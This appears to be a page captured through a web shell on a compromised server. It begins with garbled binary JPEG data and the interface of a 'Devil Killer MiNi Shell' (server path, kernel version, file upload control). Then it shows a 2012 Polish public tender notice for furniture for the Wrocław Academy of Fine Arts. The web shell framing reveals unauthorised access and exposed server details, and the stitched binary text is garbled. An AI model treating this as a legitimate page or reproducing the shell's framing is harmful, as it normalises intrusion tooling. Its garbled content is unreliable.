JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120910/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120910/338790-N-2012.html

<p class="kh_header"><b>Wrocław: DOSTAWA MEBLI - znak postępowania ZP-16/09/2012</b><br>
<b>Numer ogłoszenia: 338790 - 2012; data zamieszczenia: 10.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu , pl. Polski 3/4, 50-156 Wrocław, woj. dolnośląskie, tel. 071 3438031 w. 233, faks 071 3431558.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.asp.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MEBLI - znak postępowania ZP-16/09/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa mebli do budynków ASP we Wrocławiu

1	SZAFA METALOWA: 1.	Stabilna szafa metalowa konstrukcja z blachy, przeznaczona do przechowywania rozłożonych map, planów lub rysunków. 2.	5 wysuwanych szuflad na mapy formatu A0.
3.	szuflady z prowadnicami na łożyskach kulkowych. 4.	zamek centralny blokujący wszystkie szuflady.
5.	szafa lakierowana proszkowo. 6.	Kolor jasnoszary. WYMIARY (cm) wysokość-szerokość-głębokość 48-132-95-1szt.;

2	FOTEL: Rama: Płyta wiórowa, lite drewno, Płyta pilśniowa, sklejka. Noga: lity buk, lakier bezbarwny
Sprężyna zig-zag: stal. Siedzisko: Pianka poliuretanowa 35 kg-m3. Tył: watolina poliestrowa, Pianka poliuretanowa 25 kg-m3, Pianka poliuretanowa 35 kg-m3. Oparcie: watolina poliestrowa, Pianka poliuretanowa 25 kg-m3. Poduszka siedziska: watolina poliestrowa, włóknina polipropylenowa, Pianka poliuretanowa 35 kg-m3. Podszewka: włóknina polipropylenowa. Pokrycie fotela: 40% bawełna,  20% len, 20% wiskoza lub sztuczny jedwab, 20% poliester. Szerokość: 78 cm, Głębokość: 85 cm, Wysokość: 84 cm. Szerokość siedziska 48 cm, Głębokość siedziska: 55 cm. Wysokość siedziska: 43 cm, Kolor pokrycia - ciemnoszary-3szt.; 

3	SOFA NAROŻNA: Sofa 3-osobowa i leżanka: Zdejmowane pokrycie. Rama oparcia i siedziska: Płyta pilśniowa, wodoodporna płyta wiórowa, sklejka, pianka poliuretanowa 20 kg-m3, włóknina polipropylenowa, lita sosna.  Rama oparcia: Płyta pilśniowa, wodoodporna płyta wiórowa, sklejka, lita sosna, Pianka poliuretanowa 20 kg-m3, Pianka poliuretanowa 25 kg-m3, watolina poliestrowa. Poduszka siedziska: Pianka poliuretanowa o wysokiej sprężystości (zimna pianka) 35 kg-m3, watolina z włókien poliestrowych, Pianka poliuretanowa memory 50 kg-m3, watolina poliestrowa. Poduszka tylna: 10% ciętej pianki poliuretanowej 90% włókien poliestrowych, włókna poliestrowe. Podszewka: włóknina polipropylenowa. Szerokość: 318 cm, Głębokość: 163 cm, Wysokość: 83 cm. Minimalna głębokość siedziska: 60 cm, Maksymalna głębokość siedziska124 cm. Wysokość siedziska: 45 cm, Kolor pokrycia - ciemnoszary-1szt.;
4	SZAFKA UBRANIOWA: 	2-segmentowa, wewnątrz metalowa pionowa przegroda, w każdym segmencie u góry półka i pod nią drążek z 3 haczykami przesuwnymi, w drzwiach otwory wentylacyjne i ramka z etykietą, zamykanie zamkiem cylindrycznym z 2 kluczami i ryglujący w 1 punkcie, kolor jasnoszary RAL 7035. WYMIARY (cm) wysokość-szerokość-głębokość 180-81-50-3szt.;

5	SZAFA METALOWA DWUDRZWIOWA: 	Szafa metalowa dwudrzwiowa wzmacniana -atestowana  do przechowywania dokumentów i materiałów niejawnych, oznaczonych klauzulą poufne. Przeznaczone dla pomieszczeń biurowych i archiwów. Dostosowane do przechowywania ważnych dokumentów, akt osobowych, a także sprzętu komputerowego. Konstrukcja  z blachy stalowej o zwiększonej wytrzymałości, nadającej odpowiednią sztywność. -  Skonstruowane ze stali o podwyższonej wytrzymałości, nadającej odpowiednią sztywność oraz zabezpieczonej przed korozją.
1.	System 6 ruchomych rygli (4 poziomych i 2 pionowych), mechanizm ryglujący uruchamia się obrotową klamką i blokuje zamkiem.
2.	 Mechanizm ryglowy blokujący drzwi szafy na trzech krawędziach. Zawiasy wewnętrzne. Kąt otwarcia drzwi powinien wynosić 120 stopni. 
3.	Atestowany zamek kluczowy klasy A, zabezpieczony przed działaniem destrukcyjnym, w tym przed przewierceniem.
4.	 Wyposażona w sztywne półki o maksymalnym obciążeniu do 50 kg
5.	Pomalowana farbą proszkową       
6.	Kolor jasno-popielaty         
7.	 4 półki z możliwością regulacji zawieszenia        
Wymiary zewnętrzne:   wys. - 200mm  , szer. - 1200mm, głęb. - 500mm  , +-- 20 mm    
waga - do 110 kg-2szt.;

6	SZAFA NA PLANY I MAPY NR 1:  	DZIESIĘCIOSZUFLADOWA  SZAFA  przystosowana do przechowywania map, planów dokumentacji technicznych oraz montaży poligraficznych.          
1. Maksymalny format A-1                    
2. Wykonana z blachy czarnej o grubości 0,6 - 2,0mm               
3. Pomalowana farbami proszkowymi - epoksydowo-poliestrowymi.      
4. Szuflady przesuwane po prowadnicach teleskopowych z blokadą zabezpieczającą przed wypadnięciem.       
5. Całość zamykana jednym centralnym zamkiem. 
6. Kolor jasno-popielaty.  
Wymiary zewnętrzne szafy +- 20 mm:   szer. - 980mm - głęb. - 680mm -  wys. - 866mm, wymiary użytkowe szuflady:   szer. - 898mm  -  głęb. - 655mm - wys. -  65mm. 
Waga szafy do135kg-2szt.;

7	SZAFA NA PLANY I MAPY NR 2:   	PIĘCIOSZUFLADOWA SZAFA przystosowana do przechowywania map, planów dokumentacji technicznych oraz montaży poligraficznych.               
1. Maksymalny format B-1        
2. Wykonana z blachy czarnej o grubości 0,6 - 2,0mm
3. Pomalowana farbami proszkowymi - epoksydowo-poliestrowymi.            
4. Szuflady przesuwane po prowadnicach teleskopowych z blokadą zabezpieczającą przed wypadnięciem.    
5. Całość zamykana jednym centralnym zamkiem.      
6. Kolor jasno-popielaty.                             
wymiary zewnętrzne szafy +- 20 mm:   szer. - 1138mm , głęb.- 800mm , wys. - 562mm wymiary użytkowe szuflady:  szer.- 1057mm    głęb.- 767mm     
 wys.- 65mm.  Waga szafy do 90kg-6szt.;
8	SZAFA NA GRAFIKI : 5-szuflad A0-5	PIĘCIOSZUFLADOWA  SZAFA przystosowana do przechowywania grafik, rysunków oraz montaży poligraficznych do formatu A-0.        
1. Maksymalny format A-0.
2. Wykonana z blachy o grubości 1,0 - 2,0mm    
3. Pomalowana farbami proszkowymi - epoksydowo-poliestrowymi w kolorze RAL 9003
4.	Szuflady przesuwane po metalowych łożyskach lub 4 rolkach polipropylenowych z blokadą zabezpieczającą przed wypadnięciem.
5.	Udźwig 1 szuflady 80 kg.
6.	Uchwyt na całej długości szuflady.
6. Całość zamykana jednym centralnym zamkiem.                               
wymiary zewnętrzne szafy: 
szerokość - 1510mm, głębokość - 940mm, wysokość - 416mm
wymiary użytkowe szuflady:  szerokość - 1400mm, 
głębokość - 900mm, wysokość - 55mm           
Waga szafy do 135kg-8szt.;
9	STÓŁ: Wymiary blatu	1200x800 mm , 
wysokość  konstrukcji 750 mm
Materiał blatu	Płyta laminowana 18 mm, obrzeże PCV 2 mm
Konstrukcja	Rura stalowa okrągła, malowana proszkowo w kolorystyce RAL
Dodatki : zatyczki zabezpieczające posadzkę przed porysowaniem
Kolor konstrukcji: czarny. Kolor płyty: buk-6szt.;

10	BIURKO DLA URZĄDZEŃ AV:	Wymiary: h-74cm, szer.-180cm, gł.71cm. BUDOWA:
- korpus biurka wykonany z płyty MDF lub wiórowej  gr.18mm ,dwustronnie melaminowanej w kolorze grafitowym (zbliżonym do RAL7031);
- blat z podwójnej płyty gr.18mm, laminowany w kolorze grafitowym (zbliżonym do RAL7031), faktura np: skórka pomarańczy;
- wykończenia rantów płyt meblowych  - PCV 2mm w kolorze płyty;
- drzwiczki szafek ze szkła barwionego w masie w kolorze grafitowym  (zbliżonym do RAL7031);
- uchwyty do drzwiczek szklanych , proste podłużne, aluminium lub stal nierdz., montowane w poziomie;
- zawiasy firmowe, umożliwiające otwieranie drzwiczek po za światłem szafki (wysuwanie urządzeń);
- wysuwany blat na klawiaturę komp. głęb.45cm - szyna na rolkach firmowa;
- płyta czołowa biurka z otworami rewizyjnymi,  zasłoniętymi stalową blachą perforowaną gr 1mm (trzy panele), 
  np:Qg8-10 (kwadrat 8x8mm, odstęp10mm) 64% krycia, malowaną proszkowo RAL 7031, blachy nie ciąć przez perforację, 
  zamocować z dystansem od płyty meblowej -10mm  w sposób  łatwo demontowalny (np: śruby dokręcane ręcznie - patrz detal);
- wszystkie otwory na kable wykończyć plastikowymi przelotkami w kolorze czarnym;
- otwory w płytach meblowych i mocowanie szyn RACK dostosować do urządzeń 
- przestrzegać wymiarów szafki RACK : szerokość 52,8cm, wysokość 67cm, głębokość 66cm.
UWAGA: Wykonać wg. projektu szczegółowego - stanowiącego załącznik nr 2a-2szt.;


11	SZAFA BIUROWA NR 1:	Wysokość 2000mm, Szerokość 970 mm, Głębokość 440 mm. +- 20mm. 4 półki, wykonana z blachy o grubości 0.6-0.8 mm. Zamykana na klucz zamkiem atestowanym. Wyposażona w sztywne półki o maksymalnym obciążeniu do 50 kg. Pomalowana farbą proszkową       
Kolor popielaty- 2szt.;


12	STÓŁ WARSZTATOWY:  	Wymiary blatu 2000x700 [mm], wys. 870 [mm]. Blat wykonany ze sklejki bukowej o gr. 40 [mm]. Stelaż wykonany z profilu zamkniętego 20 mm x20 mm  i 20 mmx40mm o gr. 1,5 [mm].
Stół wyposażony w regulatory wysokości-4szt.;

13	KRZESŁO :

Krzesło warsztatowe obrotowe o z siedziskiem i oparciem wykonanym z miękkiego, profilowanego poliuretanu w kolorze czarnym, wyposażone w pierścień na stopy o regulowanej wysokości. Zmiana wysokości siedziska za pomocą siłownika pneumatycznego.
Cechy krzesła : Antypoślizgowe siedzisko i oparcie z miękkiego poliuretanu. Metalowa, lakierowana obręcz pod stopy o regulowanej śrubą wysokości. Regulacja wysokości siedziska za pomocą podnośnika pneumatycznego. Metalowa podstawa jezdna z nakładkami z plastiku.
Podstawa wyłącznie na stopkach. Wymiary - wskazane na rysunku-10szt.

13 SZAFA BIUROWA NR 2:

Szafa biurowa zamykana na kluczk (zamki okrągłe, metalowe) wraz z kluczem zapasowym.
Półki na dokumenty (segregatory). z możliwoaścią regulacji.  Szafa powinna być wykonana z płyty o grubości 1,8cm,  Tylna ściana powinna być wykonana z płyty HDF o grubości 0,3cm i fabrycznie klejona. Reszta konstrukcji i drzwi z płyty o grubości 1,8cm. 
Szafa musi być podzielona na dwie części tj. część dolna - wysokość 110cm, część górna - wysokość 110cm (jak na rysunku). Powinna mieć wysokiej jakości zawiasy meblowe, charakteryzujące się możliwością otwarcia drzwi do 175 stopni, co zapewni idealne ustawienie drzwi we wszystkich płaszczyznach.  Kolor uchwytów - satyna. Kolor szafy - ustalony z użytkownikiem  na podstawie próbek. WYMIARY (cm) wysokość-szerokość-głębokość
220-80-45. (dostawa Pl. Polski 3-4 - II piętro, pok. 217)-2szt.;

15	BIURKO NAROŻNE Z SZAFKĄ I Z WÓZKIEM NA KOMPUTER:

	Biurko składa się z 3 elementów tj. biurka narożnego, stacjonarnej szafki oraz wózka na komputer. Blat wykonany z płyty wiórowej laminowanej o gr. 25 mm, pozostałe elementy wykonane z płyty wiórowej laminowanej o gr. 18 mm. Krawędzie blatu i wysuwanej półki na klawiaturę oklejone obrzeżem PCV o gr. 2mm. Blenda do wysokości 3-4  biurka, wykonana z płyty wiórowej laminowanej o gr. 18 mm. UWAGA: 5 szuflad po prawej stronie biurka, zamykane na klucz  wyposażonych w patentowy zamek centralny + zapasowy klucz. Szuflady szerokość 40 cm. Górna szuflada wąska - piórnik. Uchwyty metalowe 2-punktowe 
Lewa zewnętrzna  strona biurka (przed stacjonarną szafką) wyposażona w przepusty kablowe.
Wysuwana półka na klawiaturę, szerokość  80cm z lewej strony biurka, zabezpieczona listwą przed wysunięciem klawiatury. Wózek na komputer z takiej samej płyty jak biurko
WYMIARY: Biurko narożne: 160x160x74-75. Szerokość 160cm - blat  strony lewej, głębokość biurka 80 cm. Szerokość 160 cm - strona prawa biurka z  5 szufladami - głębokość  biurka 60 cm. Wysokość biurka 74-75 cm. Szafka stacjonarna: Szerokość 40cm,  głębokość 80cm, wysokość 74-75. Szafka stacjonarna zamykana na klucz, z  półką w połowie wysokości, stanowiąca osobny element  biurka (dostawka z lewej strony biurka). Kolor biurka - ustalony z użytkownikiem  na podstawie próbek (dostawa Pl. Polski 3-4 - II piętro, pok. 217)-1szt.;

16 BIURKO NAROŻNE Z WÓZKIEM NA KOMPUTER:

	Biurko składa się z 2 elementów tj. biurka narożnego, oraz wózka na komputer.
Blat wykonany z płyty wiórowej laminowanej o gr. 25 mm, pozostałe elementy wykonane z płyty wiórowej laminowanej o gr. 18 mm. Krawędzie blatu i wysuwanej półki na klawiaturę oklejone obrzeżem PCV o gr. 2mm.  Uchwyty metalowe 2-punktowe . UWAGA:  4 SZUFLADY po prawej  stronie biurka, zamykane na klucz  wyposażonych w patentowy zamek centralny + zapasowy klucz. W rogu biurka maja być przepusty kablowe. Wózek na komputer z takiej samej płyty jak biurko. Kolor biurka - ustalony z użytkownikiem  na podstawie próbek. WYMIARY:  Szerokość 180cm -blat strony prawej  tj. część z szufladami. Szerokość 150 cm- strona lewa biurka. Szuflady szerokość całkowita 40 cm. Wysokość biurka 74-75 cm. Głębokość  biurka 70 cm. Biurko wizualnie zbieżne z rysunkiem poglądowym. (dostawa ul. Traugutta  - II piętro, pracownia 207)	1szt.;

17 SZAFA BIUROWA NR 3:

	Szafa biurowa zamykana na klucz (zamki okrągłe, metalowe) ) wraz z kluczem zapasowym.
Półki na dokumenty (segregatory). z możliwością regulacji. Szafa powinna być wykonana z płyty o grubości 1,8cm, Tylna ściana powinna być wykonana z płyty HDF o grubości 0,3cm i fabrycznie klejona. Reszta konstrukcji i drzwi z płyty o grubości 1,8cm. 
Powinna mieć wysokiej jakości zawiasy meblowe, charakteryzujące się możliwością otwarcia drzwi do 175 stopni, co zapewni idealne ustawienie drzwi we wszystkich płaszczyznach. 
Kolor uchwytów - satyna. Kolor szafy - ustalony z użytkownikiem  na podstawie próbek
WYMIARY (cm)wysokość-szerokość-głębokość 220-90-45-6szt.;



18 STÓŁ BIUROWY:
Blat wykonany z płyty melaminowej o grubości 25 mm, krawędzie blatu zabezpieczone są trwałym obrzeżem o grubości 2 mm w kolorze płyty. Nogi i rama stołów konferencyjnych wykonane z profili metalowych lakierowanych proszkowo . Nogi ze stopkami umożliwiającymi wypoziomowanie stołu w zakresie +10 mm zapewniające stabilność na każdej powierzchni.
WYMIARY: długość i szerokość: 160x100, wysokość: 75. (dostawa Pl. Polski 3-4 - II piętro, pok. 217)-1szt.

19  KRZESŁO BIUROWE

Krzesła systemowe Tapicerowane siedzisko i oparcie z poliesteru Stelaż chromowany tak jak przy stołach. Kolor tapicerki ciemno szary WYMIARY: wysokości siedziska - min. 42cm, szerokość siedziska: 46-54cm, głębokość 42-43cm, wysokość oparcia: 41-43cm, szerokość oparcia: 48-50cm, wysokośc krzesła: 81-83cm. Kolor niebieski - 8 szt. Kolor ciemny szary 12 szt.Kolor czerwony - 3 szt. Kolor tapicerki ustalony z użytkownikami na podstawie próbek
(dostawa Pl. Polski 3-4 - II piętro, pok. 217- 8 szt. oraz dostawa ul. Traugutta  - II piętro, pracownia 207-15szt.)-23szt.;

20 FOTEL OBROTOWY

Fotel obrotowy, ergonomiczny, wyprofilowane oparcie, tapicerowany. Plastikowe podłokietniki. 
Regulacja wysokości siedziska za pomocą podnośnika pneumatycznego oraz mechanizm ruchowy. Nylonowa podstawa jezdna. Ruchome siedzisko i oparcie z możliwością blokady w pozycji do pracy. Samohamowne kółka.Uwaga:  Kolor czarny. wymiary - wskazane na rysunku - 5szt. 


21 SZAFA BIUROWA NR 4: Szafa biurowa zamykana na kluczk (zamki okrągłe, metalowe) wraz z kluczem zapasowym.
Półki na dokumenty (segregatory). z możliwością regulacji. Szafa powinna być wykonana z płyty o grubości 1,8cm. Tylna ściana powinna być wykonana z płyty HDF o grubości 0,3cm i fabrycznie klejona. Reszta konstrukcji i drzwi z płyty o grubości 1,8cm. Powinna mieć wysokiej jakości zawiasy meblowe, charakteryzujące się możliwością otwarcia drzwi do 175 stopni, co zapewni idealne ustawienie drzwi we wszystkich płaszczyznach. Kolor uchwytów - satyna
Kolor szafy - buk. WYMIARY (cm) wysokość-szerokość-głębokość 120-80-40. (dostawa Pl. Polski -4 - II piętro, pok. 110)-2szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.00.00-2, 39.12.10.00-6, 39.14.13.00-5, 39.11.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium. 

2.	Zamawiający ustala kwotę wadium na: 2 000 zł (dwa tysiące złotych 00/100).

3.	Wadium może być wnoszone w następujących formach: 
1.	w pieniądzu, 
2.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3.	gwarancjach bankowych, 
4.	gwarancjach ubezpieczeniowych,
5.	poręczeniach bankowych lub 
6.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.).

4.	Wadium Wykonawca musi wnieść przed upływem terminu składania ofert tj. do 18-09-2012r. do godz. 10:00, na cały okres ważności oferty i nie może zawierać żadnych ograniczeń sprzecznych z ustawą, w szczególności ograniczających możliwość zrealizowania praw określonych w art. 46 ust. 4a i ust. 5 ustawy Pzp.

5.	Wadium wnoszone w pieniądzu należy wpłacić na rachunek bankowy Zamawiającego: 
ING Bank Śląski S.A. o/Wrocław nr 93 1050 1575 1000 0005 0269 6594,
z podaniem nazwy przetargu - wadium na przetarg ZP-16/09/2012. 		

6.	Wniesienie wadium w pieniądzu, w formie przelewu bankowego, Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert  tj. do -18-09-2012r.do godz. 10:00.

7.	Wadium wnoszone w innej formie niż pieniądz winno być wystawione na Zamawiającego, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie Zamawiającego. 

8.	Oryginał dokumentu wadialnego ma być zdeponowany w Kasie ASP we Wrocławiu. Wadium można składać od poniedziałku do piątku w godz. 12:00-14:00, a w dniu otwarcia ofert od godz. 9:00, (pok. 111, Ip).

9.	Zaleca się, aby do oferty Wykonawca załączył kserokopię wpłaty wadium (w przypadku wniesienia wadium w formie pieniężnej), w pozostałych przypadkach kopię dokumentu wadialnego.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni wykazać, że należycie wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonują w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie co najmniej jedną dostawę mebli o łącznej wartości nie mniejszej niż 70 000 zł brutto w ramach jednej umowy.
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia na podstawie art. 23 ustawy, określony warunek jest spełniony, gdy podmioty składające wspólną ofertę spełniają je łącznie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 3 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 3 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 3 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li></ul>
